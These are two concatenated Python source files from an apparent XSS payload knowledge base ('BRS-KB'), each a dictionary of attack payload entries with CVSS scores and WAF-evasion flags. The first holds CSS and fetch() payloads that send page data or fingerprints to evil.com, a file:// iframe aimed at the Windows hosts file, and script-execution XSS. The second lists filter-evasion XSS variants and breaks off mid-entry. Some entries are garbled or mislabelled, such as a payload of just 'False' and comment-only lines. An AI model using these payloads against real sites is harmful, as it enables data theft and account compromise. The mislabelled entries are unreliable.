#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Active
Telegram: https://t.me/EasyProTech

Low Coverage Context Enrichment
Additional payloads for contexts with <3 payloads.
"""

from ..models import Encoding, PayloadEntry, Reliability, Severity


# === CSS Cascade Layers Additional ===
CSS_CASCADE_LAYERS_EXTRA = {
    "css-layer-unnamed": PayloadEntry(
        payload='<style>@layer {*{background:url("https://evil.com/log")}}</style>',
        contexts=["css_cascade_layers", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS unnamed layer injection",
        tags=["css", "layer", "unnamed", "injection"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === CSS Container Queries Additional ===
CSS_CONTAINER_QUERIES_EXTRA = {
    "css-container-name-exfil": PayloadEntry(
        payload='<style>.c{container:sidebar/inline-size}@container sidebar(min-width:0){.x{background:url("https://evil.com/cq")}}</style>',
        contexts=["css_container_queries", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS named container query exfil",
        tags=["css", "container", "named", "query"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "css-container-style": PayloadEntry(
        payload='<style>@container style(--theme: dark){.x{background:url("https://evil.com/dark")}}</style>',
        contexts=["css_container_queries", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS container style query",
        tags=["css", "container", "style", "query"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === CSS Counter Additional ===
CSS_COUNTER_EXTRA = {
    "css-counter-attr-exfil": PayloadEntry(
        payload='<style>.x::before{content:attr(data-secret);background:url("https://evil.com/")}</style><div class=x data-secret="pwd123">',
        contexts=["css_counter", "css", "html_content"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="CSS attr() function data exfil",
        tags=["css", "counter", "attr", "exfil"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === CSS Custom Highlight Additional ===
CSS_CUSTOM_HIGHLIGHT_EXTRA = {
    "css-highlight-selection": PayloadEntry(
        payload='<style>::selection{background:url("https://evil.com/selected")}</style>',
        contexts=["css_custom_highlight", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS selection highlight for detection",
        tags=["css", "highlight", "selection", "detection"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "css-highlight-target": PayloadEntry(
        payload='<style>::target-text{background:url("https://evil.com/found")}</style>',
        contexts=["css_custom_highlight", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS target-text for fragment detection",
        tags=["css", "highlight", "target", "fragment"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === CSS Nesting Additional ===
CSS_NESTING_EXTRA = {
    "css-nesting-media": PayloadEntry(
        payload='<style>.x{@media(hover:hover){&:hover{background:url("https://evil.com/hov")}}}</style>',
        contexts=["css_nesting", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS nested media query",
        tags=["css", "nesting", "media", "hover"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === CSS Scope Additional ===
CSS_SCOPE_EXTRA = {
    "css-scope-to": PayloadEntry(
        payload='<style>@scope(.card) to (.footer){a{background:url("https://evil.com/link")}}</style>',
        contexts=["css_scope", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS @scope with limit",
        tags=["css", "scope", "limit", "to"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "css-scope-proximity": PayloadEntry(
        payload='<style>@scope(.theme-light){h1{background:url("https://evil.com/light")}}</style>',
        contexts=["css_scope", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="CSS @scope proximity",
        tags=["css", "scope", "proximity", "theme"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === File URL Additional ===
FILE_URL_EXTRA = {
    "file-url-iframe": PayloadEntry(
        payload='<iframe src="file:///C:/Windows/System32/drivers/etc/hosts"></iframe>',
        contexts=["file_url", "html_content", "url"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="File URL iframe Windows hosts",
        tags=["file", "url", "iframe", "windows"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === HTML5 Import Map Additional ===
HTML5_IMPORT_MAP_EXTRA = {
    "importmap-integrity": PayloadEntry(
        payload='<script type="importmap">{"imports":{"lodash":"https://cdn.com/lodash.js"},"integrity":{"https://cdn.com/lodash.js":"sha384-..."}}</script>',
        contexts=["html5_import_map", "html_content", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="Import map with integrity bypass",
        tags=["importmap", "integrity", "bypass", "sri"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === HTML5 Selectmenu Additional ===
HTML5_SELECTMENU_EXTRA = {
    "selectmenu-listbox": PayloadEntry(
        payload='<selectmenu><div slot="listbox" popover><img src=x onerror=alert(1)></div></selectmenu>',
        contexts=["html5_selectmenu", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Selectmenu listbox slot XSS",
        tags=["selectmenu", "listbox", "slot", "xss"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === HTML5 Speculation Rules Additional ===
HTML5_SPECULATION_RULES_EXTRA = {
    "speculation-eagerness": PayloadEntry(
        payload='<script type="speculationrules">{"prefetch":[{"source":"list","urls":["/page"],"eagerness":"immediate"}]}</script>',
        contexts=["html5_speculation_rules", "html_content"],
        severity=Severity.MEDIUM,
        cvss_score=4.0,
        description="Speculation rules immediate prefetch",
        tags=["speculation", "prefetch", "eagerness", "immediate"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Is Attribute Additional ===
IS_ATTRIBUTE_EXTRA = {
    "is-autonomous-element": PayloadEntry(
        payload='<script>customElements.define("xss-el",class extends HTMLElement{connectedCallback(){alert(1)}})</script><xss-el></xss-el>',
        contexts=["is_attribute", "html_content", "custom_elements"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Autonomous custom element XSS",
        tags=["custom-element", "autonomous", "connectedCallback", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === JS Modern Features Additional ===
JS_MODERN_EXTRA = {
    "js-decorators-field": PayloadEntry(
        payload='class C { @inject accessor xss = "<script>alert(1)</script>"; }',
        contexts=["js_decorators", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="JS decorator on accessor field",
        tags=["javascript", "decorator", "accessor", "field"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "js-import-attributes": PayloadEntry(
        payload='import styles from "./xss.css" with { type: "css" }; document.adoptedStyleSheets = [styles];',
        contexts=["js_import_assertions", "javascript", "css"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="JS import attributes CSS injection",
        tags=["javascript", "import", "attributes", "css"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "js-private-get": PayloadEntry(
        payload="class C { #xss; get html() { return this.#xss; } set html(v) { this.#xss = v; } }",
        contexts=["js_private_methods", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=4.0,
        description="JS private field getter/setter",
        tags=["javascript", "private", "getter", "setter"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "js-sab-worker": PayloadEntry(
        payload='const sab = new SharedArrayBuffer(8); const worker = new Worker("timing.js"); worker.postMessage(sab);',
        contexts=["js_sharedarraybuffer", "javascript", "webworker"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="SharedArrayBuffer with Worker",
        tags=["javascript", "sharedarraybuffer", "worker", "timing"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "js-temporal-zoneddatetime": PayloadEntry(
        payload="const zdt = Temporal.Now.zonedDateTimeISO(); // Precise timing",
        contexts=["js_temporal_api", "javascript"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="Temporal ZonedDateTime for timing",
        tags=["javascript", "temporal", "zoneddatetime", "timing"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "js-toplevel-dynamic": PayloadEntry(
        payload="const module = await import(userControlledPath);",
        contexts=["js_top_level_await", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Top-level await dynamic import",
        tags=["javascript", "await", "import", "dynamic"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Media Query Additional ===
MEDIA_QUERY_EXTRA = {
    "media-query-resolution": PayloadEntry(
        payload='<style>@media(min-resolution:2dppx){body{background:url("https://evil.com/retina")}}</style>',
        contexts=["media_query", "css", "html_content"],
        severity=Severity.LOW,
        cvss_score=2.0,
        description="Media query resolution fingerprint",
        tags=["media", "query", "resolution", "fingerprint"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === MHTML Additional ===
MHTML_EXTRA = {
    "mhtml-multipart": PayloadEntry(
        payload="Content-Type: multipart/related\n\n--boundary\nContent-Type: text/html\n\n<script>alert(1)</script>",
        contexts=["mhtml", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="MHTML multipart injection",
        tags=["mhtml", "multipart", "boundary", "ie"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Next.js Additional ===
NEXTJS_EXTRA = {
    "nextjs-getServerSideProps": PayloadEntry(
        payload='export async function getServerSideProps() { return { props: { html: "<script>alert(1)</script>" } }; }',
        contexts=["nextjs", "nextjs_approuter", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Next.js getServerSideProps XSS",
        tags=["nextjs", "ssr", "props", "xss"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Nuxt Additional ===
NUXT_EXTRA = {
    "nuxt-asyncData": PayloadEntry(
        payload='export default { async asyncData() { return { xss: "<img src=x onerror=alert(1)>" } } }',
        contexts=["nuxt", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Nuxt asyncData XSS",
        tags=["nuxt", "asyncdata", "ssr", "xss"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Origin Isolation Additional ===
ORIGIN_ISOLATION_EXTRA = {
    "origin-isolation-postMessage": PayloadEntry(
        payload='window.postMessage({type:"xss",payload:"<script>alert(1)</script>"},"*")',
        contexts=["origin_isolation", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="postMessage to isolated origin",
        tags=["origin", "isolation", "postMessage", "xss"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === VBScript Protocol Additional ===
VBSCRIPT_EXTRA = {
    "vbscript-input": PayloadEntry(
        payload='<input type=text value="" onfocus="vbscript:MsgBox(1)">',
        contexts=["vbscript_protocol", "html_content"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="VBScript in onfocus handler",
        tags=["vbscript", "protocol", "onfocus", "ie"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === WebAssembly Additional ===
WASM_EXTRA = {
    "wasm-compile-inject": PayloadEntry(
        payload="WebAssembly.compile(userBuffer).then(m => new WebAssembly.Instance(m))",
        contexts=["wasm_xss", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="WebAssembly compile from user buffer",
        tags=["wasm", "compile", "buffer", "execute"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === WebAssembly GC Additional ===
WEBASSEMBLY_GC_EXTRA = {
    "wasm-gc-array": PayloadEntry(
        payload="// WASM GC array type for complex object graphs",
        contexts=["webassembly_gc", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="WebAssembly GC array type",
        tags=["wasm", "gc", "array", "type"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Web APIs Additional ===
WEB_APIS_EXTRA = {
    "web-bluetooth-write": PayloadEntry(
        payload="characteristic.writeValue(new TextEncoder().encode(userInput))",
        contexts=["web_bluetooth", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Web Bluetooth write to device",
        tags=["web-bluetooth", "write", "characteristic", "ble"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "web-locks-steal": PayloadEntry(
        payload='navigator.locks.request("auth_token", {steal: true}, async lock => { /* steal lock */ })',
        contexts=["web_locks", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="Web Locks steal option",
        tags=["web-locks", "steal", "exclusive", "takeover"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "web-serial-signals": PayloadEntry(
        payload="await port.setSignals({dataTerminalReady: true, requestToSend: true})",
        contexts=["web_serial", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Web Serial signal manipulation",
        tags=["web-serial", "signals", "dtr", "rts"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "web-share-target": PayloadEntry(
        payload="navigator.canShare({files:[maliciousFile]})",
        contexts=["web_share", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="Web Share target check",
        tags=["web-share", "canShare", "files", "check"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "web-usb-claim": PayloadEntry(
        payload="await device.claimInterface(0); await device.transferOut(1, payload)",
        contexts=["web_usb", "javascript"],
        severity=Severity.HIGH,
        cvss_score=8.0,
        description="Web USB interface claim and transfer",
        tags=["web-usb", "claim", "interface", "transfer"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "webcodecs-encoder": PayloadEntry(
        payload="new VideoEncoder({output:(chunk)=>exfil(chunk),error:()=>{}})",
        contexts=["webcodecs", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="WebCodecs encoder output exfil",
        tags=["webcodecs", "encoder", "output", "exfil"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "webgpu-adapter": PayloadEntry(
        payload='const adapter = await navigator.gpu.requestAdapter(); fetch("https://evil.com/gpu?"+adapter.name)',
        contexts=["webgpu", "javascript"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="WebGPU adapter fingerprint",
        tags=["webgpu", "adapter", "fingerprint", "name"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "webnn-operator": PayloadEntry(
        payload="const output = builder.add(input, maliciousTensor)",
        contexts=["webnn", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="WebNN operator manipulation",
        tags=["webnn", "operator", "tensor", "manipulation"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    "webtransport-bidirectional": PayloadEntry(
        payload="const stream = await transport.createBidirectionalStream(); const writer = stream.writable.getWriter();",
        contexts=["webtransport", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="WebTransport bidirectional stream",
        tags=["webtransport", "stream", "bidirectional", "write"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === XML Namespace Additional ===
XML_NAMESPACE_EXTRA = {
    "xml-ns-mathml": PayloadEntry(
        payload='<math xmlns="http://www.w3.org/1998/Math/MathML"><annotation-xml encoding="text/html"><script>alert(1)</script></annotation-xml></math>',
        contexts=["xml_namespace", "html_content", "mathml"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="MathML namespace XSS",
        tags=["xml", "namespace", "mathml", "annotation"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Preact Additional ===
PREACT_EXTRA = {
    "preact-htm": PayloadEntry(
        payload="html`<div innerHTML=${userInput}></div>`",
        contexts=["preact", "javascript", "template"],
        severity=Severity.HIGH,
        cvss_score=7.5,
        description="Preact htm tagged template innerHTML",
        tags=["preact", "htm", "innerHTML", "template"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
}

# === Tauri Additional ===
TAURI_EXTRA = {
    "tauri-event": PayloadEntry(
        payload='emit("custom_event", { payload: userInput })',
        contexts=["tauri", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Tauri event system injection",
        tags=["tauri", "event", "emit", "injection"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# === Final Coverage Additions ===
FINAL_COVERAGE_PAYLOADS = {
    # Cross-Origin Isolated
    "coi-measureuseragent": PayloadEntry(
        payload='navigator.userAgentData.getHighEntropyValues(["platform"]).then(v => fetch("https://evil.com/?p="+v.platform))',
        contexts=["cross_origin_isolated", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=4.0,
        description="User-Agent Client Hints with COOP/COEP",
        tags=["coi", "useragent", "hints", "fingerprint"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # JS Decorators
    "js-decorators-method": PayloadEntry(
        payload="function xssDecorator(target, key) { target[key] = () => alert(1); }",
        contexts=["js_decorators", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="Decorator method override",
        tags=["javascript", "decorator", "method", "override"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # JS Import Assertions
    "js-import-json-xss": PayloadEntry(
        payload='import config from "./config.json" assert { type: "json" }; element.innerHTML = config.template;',
        contexts=["js_import_assertions", "javascript", "json"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="JSON import rendered as HTML",
        tags=["javascript", "import", "json", "html"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # JS Private Methods
    "js-private-static": PayloadEntry(
        payload="class C { static #xss = () => alert(1); static exec() { this.#xss(); } }",
        contexts=["js_private_methods", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=4.0,
        description="Static private method",
        tags=["javascript", "private", "static", "method"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # JS SharedArrayBuffer
    "js-sab-atomic-wait": PayloadEntry(
        payload="const sab = new SharedArrayBuffer(4); Atomics.wait(new Int32Array(sab), 0, 0, timeout);",
        contexts=["js_sharedarraybuffer", "javascript"],
        severity=Severity.HIGH,
        cvss_score=7.0,
        description="Atomics.wait for precise timing",
        tags=["javascript", "sharedarraybuffer", "atomics", "wait"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # JS Temporal API
    "js-temporal-duration": PayloadEntry(
        payload="const d = Temporal.Duration.from({milliseconds:1}); // Sub-ms timing",
        contexts=["js_temporal_api", "javascript"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="Temporal Duration for timing",
        tags=["javascript", "temporal", "duration", "timing"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # JS Top-Level Await
    "js-toplevel-fetch": PayloadEntry(
        payload="const html = await (await fetch(userUrl)).text(); document.body.innerHTML = html;",
        contexts=["js_top_level_await", "javascript"],
        severity=Severity.CRITICAL,
        cvss_score=9.0,
        description="Top-level await fetch to innerHTML",
        tags=["javascript", "await", "fetch", "innerHTML"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    # Origin Isolation
    "origin-isolation-storage": PayloadEntry(
        payload='// With Origin-Agent-Cluster header\nlocalStorage.setItem("xss", payload)',
        contexts=["origin_isolation", "javascript", "storage"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="Storage access with origin isolation",
        tags=["origin", "isolation", "storage", "local"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # Origin Trial
    "origin-trial-scheduler": PayloadEntry(
        payload='scheduler.postTask(() => { alert(1) }, {priority: "user-blocking"})',
        contexts=["origin_trial", "javascript"],
        severity=Severity.MEDIUM,
        cvss_score=5.0,
        description="Scheduler API via origin trial",
        tags=["origin-trial", "scheduler", "api", "task"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # Permissions Policy
    "permissions-policy-document": PayloadEntry(
        payload='document.featurePolicy.allowedFeatures().forEach(f => fetch("https://evil.com/f?"+f))',
        contexts=["permissions_policy", "javascript"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="Feature policy enumeration",
        tags=["permissions-policy", "feature", "enumeration", "leak"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # SSE ID
    "sse-id-tracking": PayloadEntry(
        payload="id: user_123_secret_token\ndata: heartbeat\n\n",
        contexts=["sse_id", "sse_event"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="SSE id for session tracking leak",
        tags=["sse", "id", "tracking", "session"],
        reliability=Reliability.MEDIUM,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
    # Subresource Integrity
    "sri-crossorigin": PayloadEntry(
        payload='<script src="https://cdn.com/lib.js" integrity="sha384-HASH" crossorigin="anonymous"></script>',
        contexts=["subresource_integrity", "html_content"],
        severity=Severity.MEDIUM,
        cvss_score=4.0,
        description="SRI with crossorigin attribute",
        tags=["sri", "crossorigin", "anonymous", "cdn"],
        reliability=Reliability.HIGH,
        encoding=Encoding.NONE,
        waf_evasion=False,
    ),
    # WebAssembly GC
    "wasm-gc-i31ref": PayloadEntry(
        payload="// WASM GC i31ref for compact integer references",
        contexts=["webassembly_gc", "javascript"],
        severity=Severity.LOW,
        cvss_score=3.0,
        description="WebAssembly GC i31ref type",
        tags=["wasm", "gc", "i31ref", "reference"],
        reliability=Reliability.LOW,
        encoding=Encoding.NONE,
        waf_evasion=True,
    ),
}

# Combined
LOWCOV_ENRICHMENT_PAYLOADS = {
    **CSS_CASCADE_LAYERS_EXTRA,
    **CSS_CONTAINER_QUERIES_EXTRA,
    **CSS_COUNTER_EXTRA,
    **CSS_CUSTOM_HIGHLIGHT_EXTRA,
    **CSS_NESTING_EXTRA,
    **CSS_SCOPE_EXTRA,
    **FILE_URL_EXTRA,
    **HTML5_IMPORT_MAP_EXTRA,
    **HTML5_SELECTMENU_EXTRA,
    **HTML5_SPECULATION_RULES_EXTRA,
    **IS_ATTRIBUTE_EXTRA,
    **JS_MODERN_EXTRA,
    **MEDIA_QUERY_EXTRA,
    **MHTML_EXTRA,
    **NEXTJS_EXTRA,
    **NUXT_EXTRA,
    **ORIGIN_ISOLATION_EXTRA,
    **VBSCRIPT_EXTRA,
    **WASM_EXTRA,
    **WEBASSEMBLY_GC_EXTRA,
    **WEB_APIS_EXTRA,
    **XML_NAMESPACE_EXTRA,
    **PREACT_EXTRA,
    **TAURI_EXTRA,
    **FINAL_COVERAGE_PAYLOADS,
}

LOWCOV_ENRICHMENT_TOTAL = len(LOWCOV_ENRICHMENT_PAYLOADS)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Filter Evasion Core Payloads - Part 1
"""

from typing import Dict

from ..models import PayloadEntry


FILTER_EVASION_CORE_PAYLOADS_PART1: Dict[str, PayloadEntry] = {
    "filter_evasion_001": PayloadEntry(
        payload="<Script>AleRt(1)</Script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_002": PayloadEntry(
        payload="<ScRiPt>AlErT(1)</ScRiPt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_003": PayloadEntry(
        payload='<script>alert/**/("1")</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_004": PayloadEntry(
        payload='<script>alert(/**/"1")</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_005": PayloadEntry(
        payload='<script>self["ale"+"rt"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_006": PayloadEntry(
        payload="<script>prompt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_007": PayloadEntry(
        payload="<script>confirm(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_008": PayloadEntry(
        payload="<script>console.log(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_009": PayloadEntry(
        payload="<script>console.error(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_010": PayloadEntry(
        payload="<script>alert(1)",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_011": PayloadEntry(
        payload="<script>alert(1)//</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_012": PayloadEntry(
        payload="<script>alert(1)/*</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_013": PayloadEntry(
        payload="<<script>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_014": PayloadEntry(
        payload="<script<script>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_015": PayloadEntry(
        payload="<script>alert(1)<</script>/script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_016": PayloadEntry(
        payload="<foreignObject><script>alert(1)</script></foreignObject>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_017": PayloadEntry(
        payload="False",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_018": PayloadEntry(
        payload='<button formaction="javascript:alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_019": PayloadEntry(
        payload='<style>@import"javascript:alert(1)";</style>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_020": PayloadEntry(
        payload='<style>body{background:url("javascript:alert(1)")}</style>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_021": PayloadEntry(
        payload="<img src=x OnError=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_022": PayloadEntry(
        payload="<img src=x ONERROR=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_023": PayloadEntry(
        payload="<img src=x onError=alert(1)>",
        contexts=["html_content"],
        severity="high",
